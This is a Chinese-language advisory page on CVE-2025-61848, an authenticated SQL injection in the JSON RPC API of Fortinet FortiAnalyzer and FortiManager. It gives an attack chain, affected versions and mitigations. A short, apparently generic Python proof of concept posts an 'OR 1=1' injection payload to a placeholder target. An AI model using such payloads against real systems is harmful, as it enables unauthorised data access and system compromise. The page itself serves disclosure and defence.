CVE-2025-61848 Fortinet SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-61848

漏洞类型

SQL注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiAnalyzer, Fortinet FortiManager

漏洞概述

Fortinet FortiAnalyzer和FortiManager产品中发现一处严重的SQL注入漏洞（CVE-2025-61848）。该漏洞源于系统未能正确中和用于SQL命令中的特殊元素。攻击者需拥有高权限账号，并利用JSON RPC API接口发送特制请求来利用此漏洞。成功利用后，攻击者可在系统上执行未经授权的代码或命令，导致数据泄露、系统被完全控制等严重后果。受影响的版本范围较广，包括7.0、7.2全版本以及7.4和7.6的特定版本。

技术细节

该漏洞属于SQL注入（SQL Injection）类型，位于Fortinet FortiAnalyzer和FortiManager的JSON RPC API处理逻辑中。由于应用程序在构造后端数据库查询时，未对通过API传入的参数进行严格的输入验证和过滤，导致攻击者可以将恶意的SQL语句拼接到正常查询中。尽管CVSS向量显示攻击需要高权限（PR:H），即攻击者必须先通过认证获取管理员或高权限用户身份，但一旦跨越此门槛，攻击者即可通过构造恶意的JSON数据包发送至目标端点。通过利用数据库的漏洞，攻击者可能读取敏感配置信息、篡改数据，甚至在特定数据库配置下通过存储过程或扩展库执行操作系统级别的命令，从而实现远程代码执行（RCE），完全破坏系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察与信息收集

攻击者扫描网络，识别出运行受影响版本FortiAnalyzer或FortiManager的目标设备，并确定其JSON RPC API接口。

STEP 2

获取高权限凭证

由于漏洞需要高权限（PR:H），攻击者通过钓鱼、暴力破解或利用其他漏洞获取具有管理员权限的账号凭证。

STEP 3

构造并发送恶意Payload

攻击者使用获取的凭证建立会话，并构造包含SQL注入语句的恶意JSON数据包，通过POST请求发送至JSON RPC API端点。

STEP 4

执行未授权代码

后端数据库执行注入的恶意SQL语句，导致攻击者能够在系统上下文中执行任意代码或命令，从而控制目标系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration
target_url = "https://<target-ip>/jsonrpc"
headers = {
    "Content-Type": "application/json",
    "Cookie": "<authenticated_session_cookie>"
}

# Vulnerable payload demonstrating SQL Injection via JSON RPC
# This payload attempts to manipulate a SQL query logic
payload = {
    "id": 1,
    "method": "exec", 
    "params": [
        {
            "data": "valid_data' OR 1=1-- "
        }
    ]
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:", response.text)
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

FortiAnalyzer 7.0 所有版本

FortiAnalyzer 7.2 所有版本

FortiAnalyzer 7.4.0 至 7.4.8

FortiAnalyzer 7.6.0 至 7.6.4

FortiAnalyzer Cloud 7.0 所有版本

FortiAnalyzer Cloud 7.2 所有版本

FortiAnalyzer Cloud 7.4.0 至 7.4.8

FortiAnalyzer Cloud 7.6.0 至 7.6.4

FortiManager 7.0 所有版本

FortiManager 7.2 所有版本

FortiManager 7.4.0 至 7.4.8

FortiManager 7.6.0 至 7.6.4

FortiManager Cloud 7.0 所有版本

FortiManager Cloud 7.2 所有版本

FortiManager Cloud 7.4.0 至 7.4.8

FortiManager Cloud 7.6.0 至 7.6.4

防御指南

临时缓解措施

在无法立即补丁的情况下，建议通过网络ACL严格限制对管理界面和JSON RPC端口的访问，确保仅管理员IP可以连接。同时，加强账户安全策略，启用多因素认证（MFA），防止攻击者窃取高权限凭证。此外，应密切监控系统日志中是否存在异常的数据库查询或API调用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61848
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61848
3 Details https://www.cvedetails.com/cve/CVE-2025-61848/
4 VulDB https://vuldb.com/cve/CVE-2025-61848
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-26-111